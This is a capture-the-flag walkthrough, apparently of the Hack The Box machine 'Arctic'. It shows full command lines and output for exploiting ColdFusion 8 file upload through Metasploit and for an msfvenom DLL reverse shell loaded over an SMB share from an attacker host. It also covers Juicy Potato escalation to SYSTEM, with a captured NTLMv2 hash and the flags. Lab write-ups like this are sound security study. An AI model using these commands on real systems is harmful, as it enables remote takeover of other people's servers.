Eui Chul Chung

Vulnerability Researcher
PEN: OSCP, OSEP, OSCE3
WEB: OSWA, OSWE
EXP: OSED


Categories:

Tags:
Area of Interest:
Categories:
Vulnerabilities:



About

Arctic is fairly straightforward, however the load times on the web server pose a few challenges for exploitation. Basic troubleshooting is required to get the correct exploit functioning properly.

Enumeration

Running the script portscan.sh reveals 2 attack vectors, RPC and HTTP.

┌──(m0nk3y@kali)-[~/HTB/Arctic]
└─$ sudo portscan.sh 10.129.67.193

┌──(m0nk3y@kali)-[~/HTB/Arctic]
└─$ cat PortScan\(10.129.67.193\)

PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  http    JRun Web Server
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Exploitation

HTTP

Checking the index page shows 2 directories CFIDE and cfdocs.

After a bit of enumeration, I’m able to find the documentation from http://10.129.67.193:8500/cfdocs/dochome.htm, which reveals the service Adobe ColdFusion 8 running on the target.

searchsploit-prettify.py reveals numerous exploits for Adobe ColdFusion 8. From these exploits, I’ll start by testing ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit) which seemingly allows remote code execution without requiring any authentication.

┌──(m0nk3y@kali)-[~/HTB/Arctic]
└─$ searchsploit-prettify.py 'ColdFusion 8'
 ----------------------------------------------------------------------------------------------------------------- ----------------------------------------------------------
| Exploit Title                                                                                                   | Path                                                     |
 ----------------------------------------------------------------------------------------------------------------- ----------------------------------------------------------
| Adobe ColdFusion - 'probe.cfm' Cross-Site Scripting                                                             | /usr/share/exploitdb/exploits/cfm/webapps/36067.txt      |
| Adobe ColdFusion - Directory Traversal (Metasploit)                                                             | /usr/share/exploitdb/exploits/multiple/remote/16985.rb   |
| Adobe ColdFusion - Directory Traversal                                                                          | /usr/share/exploitdb/exploits/multiple/remote/14641.py   |
| Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution (RCE)                              | /usr/share/exploitdb/exploits/windows/remote/50781.txt   |
| Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution                     | /usr/share/exploitdb/exploits/windows/remote/43993.py    |
| Adobe ColdFusion 2018 - Arbitrary File Upload                                                                   | /usr/share/exploitdb/exploits/multiple/webapps/45979.txt |
| Adobe ColdFusion 6/7 - User_Agent Error Page Cross-Site Scripting                                               | /usr/share/exploitdb/exploits/cfm/webapps/29567.txt      |
| Adobe ColdFusion 7 - Multiple Cross-Site Scripting Vulnerabilities                                              | /usr/share/exploitdb/exploits/cfm/webapps/36172.txt      |
| Adobe ColdFusion 8 - Remote Command Execution (RCE)                                                             | /usr/share/exploitdb/exploits/cfm/webapps/50057.py       |
| Adobe ColdFusion 9 - Administrative Authentication Bypass (Metasploit)                                          | /usr/share/exploitdb/exploits/multiple/remote/30210.rb   |
| Adobe ColdFusion 9 - Administrative Authentication Bypass                                                       | /usr/share/exploitdb/exploits/windows/webapps/27755.txt  |
| Adobe ColdFusion < 11 Update 10 - XML External Entity Injection                                                 | /usr/share/exploitdb/exploits/multiple/webapps/40346.py  |
| Adobe ColdFusion APSB13-03 - Remote Multiple Vulnerabilities (Metasploit)                                       | /usr/share/exploitdb/exploits/multiple/remote/24946.rb   |
| Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm' Query String Cross-Site Scripting                    | /usr/share/exploitdb/exploits/cfm/webapps/33170.txt      |
| Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authenticatewizarduser.cfm' Query String Cross-Site Scripting | /usr/share/exploitdb/exploits/cfm/webapps/33167.txt      |
| Adobe ColdFusion Server 8.0.1 - '/wizards/common/_logintowizard.cfm' Query String Cross-Site Scripting          | /usr/share/exploitdb/exploits/cfm/webapps/33169.txt      |
| Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/searchlog.cfm?startRow' Cross-Site Scripting           | /usr/share/exploitdb/exploits/cfm/webapps/33168.txt      |
| Allaire ColdFusion Server 4.0 - Remote File Display / Deletion / Upload / Execution                             | /usr/share/exploitdb/exploits/multiple/remote/19093.txt  |
| Allaire ColdFusion Server 4.0.1 - 'CFCRYPT.EXE' Decrypt Pages                                                   | /usr/share/exploitdb/exploits/windows/local/19220.c      |
| ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit)                                               | /usr/share/exploitdb/exploits/cfm/webapps/16788.rb       |
| ColdFusion 9-10 - Credential Disclosure                                                                         | /usr/share/exploitdb/exploits/multiple/webapps/25305.py  |
| ColdFusion MX - Missing Template Cross-Site Scripting                                                           | /usr/share/exploitdb/exploits/cfm/remote/21548.txt       |
| ColdFusion MX - Remote Development Service                                                                      | /usr/share/exploitdb/exploits/windows/remote/50.pl       |
| ColdFusion Scripts Red_Reservations - Database Disclosure                                                       | /usr/share/exploitdb/exploits/asp/webapps/7440.txt       |
| ColdFusion Server 2.0/3.x/4.x - Administrator Login Password Denial of Service                                  | /usr/share/exploitdb/exploits/multiple/dos/19996.txt     |
| Macromedia ColdFusion MX 6.0 - Remote Development Service File Disclosure                                       | /usr/share/exploitdb/exploits/multiple/remote/22867.pl   |
| Macromedia ColdFusion MX 6.0 - SQL Error Message Cross-Site Scripting                                           | /usr/share/exploitdb/exploits/cfm/webapps/23256.txt      |
| Macromedia ColdFusion MX 6.1 - Template Handling Privilege Escalation                                           | /usr/share/exploitdb/exploits/multiple/remote/24654.txt  |
 ----------------------------------------------------------------------------------------------------------------- ----------------------------------------------------------

By executing the exploit with an increased timeout threshold to mitigate for the slow response time from the web server, I’m able to gain a shell as the user arctic\tolis.

┌──(m0nk3y@kali)-[~/HTB/Arctic]
└─$ msfconsole -q -x 'use exploit/windows/http/coldfusion_fckeditor; set RHOSTS 10.129.67.193; set RPORT 8500; set HttpClientTimeout 60; set LHOST 10.10.16.9; set LPORT 4444; run'
[*] Starting persistent handler(s)...
[*] No payload configured, defaulting to generic/shell_reverse_tcp
RHOSTS => 10.129.67.193
RPORT => 8500
HttpClientTimeout => 60.0
LHOST => 10.10.16.9
LPORT => 4444
[*] Started reverse TCP handler on 10.10.16.9:4444
[*] Sending our POST request...
[*] Upload succeeded! Executing payload...
[*] Command shell session 1 opened (10.10.16.9:4444 -> 10.129.67.193:49264) at 2023-09-08 10:27:19 -0400


Shell Banner:
Microsoft Windows [Version 6.1.7600]
-----


C:\ColdFusion8\runtime\bin>whoami
whoami
arctic\tolis

Lateral Movement

In order to upgrade the given shell into a meterpreter shell, I’ll create a DLL reverse shell payload using msfvenom.

┌──(m0nk3y@kali)-[~/HTB/Arctic]
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.9 LPORT=4444 -f dll -o exploit.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of dll file: 9216 bytes
Saved as: exploit.dll

By setting up a SMB server and triggering the reverse shell via rundll32.exe, I’m able to upgrade the session to a meterpreter shell.

C:\ColdFusion8\runtime\bin>rundll32.exe \\10.10.16.9\pwn\exploit.dll,0
rundll32.exe \\10.10.16.9\pwn\exploit.dll,0

┌──(m0nk3y@kali)-[~/HTB/Arctic]
└─$ smbserver.py pwn . -ip 10.10.16.9
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.129.67.193,49269)
[*] AUTHENTICATE_MESSAGE (ARCTIC\tolis,ARCTIC)
[*] User ARCTIC\tolis authenticated successfully
[*] tolis::ARCTIC:aaaaaaaaaaaaaaaa:9afb545fbc03e92d239fcc1a50794ba6:0101000000000000808a08ba60e2d9016aee27ac0f0a4ad6000000000100100073004d004600430065005500570072000300100073004d0046004300650055005700720002001000770069006b005400570063006a00590004001000770069006b005400570063006a00590007000800808a08ba60e2d901060004000200000008003000300000000000000000000000003000005d6f2db8366052bcd74b291f5c62c3be05c41ffc153e3d39f4ea708b662a87910a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e003900000000000000000000000000
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:PWN)
[*] Closing down connection (10.129.67.193,49269)
[*] Remaining connections []

┌──(m0nk3y@kali)-[~/HTB/Arctic]
└─$ msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 10.10.16.9; set LPORT 4444; run'
[*] Starting persistent handler(s)...
[*] Using configured payload generic/shell_reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 10.10.16.9
LPORT => 4444
[*] Started reverse TCP handler on 10.10.16.9:4444
[*] Sending stage (175686 bytes) to 10.129.67.193
[*] Meterpreter session 1 opened (10.10.16.9:4444 -> 10.129.67.193:49272) at 2023-09-08 10:28:48 -0400

meterpreter > getuid
Server username: ARCTIC\tolis

Privilege Escalation

Checking the privilege shows that the user ARCTIC\tolis has SeImpersonatePrivilege which allows us to use Juicy Potato to gain SYSTEM privilege.

C:\ColdFusion8\runtime\bin>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

Since we already have a meterpreter shell, I’ll use the Metasploit module exploit/windows/local/ms16_075_reflection_juicy instead to perform privilege escalation and gain a shell as the user NT AUTHORITY\SYSTEM.

meterpreter > run exploit/windows/local/ms16_075_reflection_juicy LHOST=10.10.16.9 LPORT=4444

[*] Started reverse TCP handler on 10.10.16.9:4444
[+] Target appears to be vulnerable (Windows 2008 R2)
[*] Launching notepad to host the exploit...
[+] Process 3884 launched.
[*] Reflectively injecting the exploit DLL into 3884...
[*] Injecting exploit into 3884...
[*] Exploit injected. Injecting exploit configuration into 3884...
[*] Configuration injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175686 bytes) to 10.129.67.193
[*] Meterpreter session 2 opened (10.10.16.9:4444 -> 10.129.67.193:49293) at 2023-09-08 10:32:39 -0400
[*] Session 2 created in the background.

meterpreter > sessions 2
[*] Backgrounding session 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Post Exploitation

With the shell acquired, I’m able to read the flags user.txt and root.txt.

meterpreter > cat 'C:\Users\tolis\Desktop\user.txt'
f22cfb9f55071fc296c21935628b9015

meterpreter > cat 'C:\Users\Administrator\Desktop\root.txt'
52f94900f26d3df7fcb67dbaa9207a8c